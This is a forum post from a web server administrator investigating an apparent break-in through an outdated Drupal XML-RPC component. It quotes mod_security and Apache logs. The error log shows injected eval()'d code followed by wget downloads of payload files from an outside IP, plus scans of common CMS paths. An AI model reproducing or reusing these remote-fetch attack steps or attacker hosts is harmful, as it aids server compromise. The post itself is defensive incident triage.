After googling the web. I've found something call modsecurity for apache.. it's a web application firewall..
I installed and configure it.. and it looks like the problem occured because I didn't update my Drupal..
Here is one of the entry in my logfile from modsecurity
Quote:
==09758743==============================
Request: www.mydomain.com ##.##.###.### - - [23/Dec/2005:22:56:56 --0500] "POST /xmlrpc.php HTTP/1.1" 412 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 " H@188cCoAGUAAD1eAxsAAAAJ "-"
Handler: php5-script
----------------------------------------
POST /xmlrpc.php HTTP/1.1
Host: ##.##.###.###
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1
Content-Type: text/xml
Content-Length: 269
mod_security-message: Access denied with code 412. Pattern match "<(.|\\n)+>" at POST_PAYLOAD
mod_security-action: 412
269
HTTP/1.1 412 Precondition Failed
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
--09758743--
|
Is this HTML/Javascript injection attack? (whatever that is)
Also, after carefully looked at my apache error log, here the part where things went wrong
Quote:
[Tue Dec 20 08:48:43 2005] [error] [client 216.138.244.145] script not found or unable to stat: /var/www/cgi-bin/awstats
[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
[client 216.138.244.145] PHP Warning: Unterminated comment starting line 1 in /var/www/html/blog/includes/xmlrpcs.inc(249) : eval()'d code on line 1
--08:48:47-- http://209.136.48.69/mirela
=> `mirela'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 94 [text/plain]
0K 100% 3.90 MB/s
08:48:47 (3.90 MB/s) - `mirela' saved [94/94]
--08:48:47-- http://209.136.48.69/d
=> `d'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 469,240 (458K) [text/plain]
0K ...[Tue Dec 20 08:48:48 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blog/xmlsrv
....... ...[Tue Dec 20 08:48:49 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blogs
....... ..[Tue Dec 20 08:48:50 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/drupal
.......[Tue Dec 20 08:48:52 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/phpgroupware
. ......[Tue Dec 20 08:48:53 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/wordpress
..[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
.. .......... 10% 6.81 KB/s
50K ...[Tue Dec 20 08:48:55 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlrpc
.......[Tue Dec 20 08:48:56 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlsrv
.......... .......... .......... .......... 21% 6.95 KB/s
100K .......... .......... .......... .......... .......... 32% 6.94 KB/s
150K .......... .......... .......... .......... .......... 43% 7.11 KB/s
200K .......... .......... .......... .......... .......... 54% 7.17 KB/s
250K .......... .......... .......... .......... .......... 65% 7.60 KB/s
300K .......... .......... .......... .......... .......... 76% 8.67 KB/s
350K .......... .......... .......... .......... .......... 87% 14.05 KB/s
400K .......... .......... .......... .......... .......... 98% 13.90 KB/s
450K ........ 100% 19.13 KB/s
08:49:43 (8.23 KB/s) - `d' saved [469240/469240]
--08:49:43-- http://209.136.48.69/w
=> `w'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,913 (34K) [text/plain]
0K .......... .......... .......... .... 100% 16.89 KB/s
08:49:45 (16.89 KB/s) - `w' saved [34913/34913]
|
Now I've modsecurity installed.
Block the attacker ip (although they can always use other IP to attack me again).
hm.. whatelse should I do next?

btw, thanks for all your reply
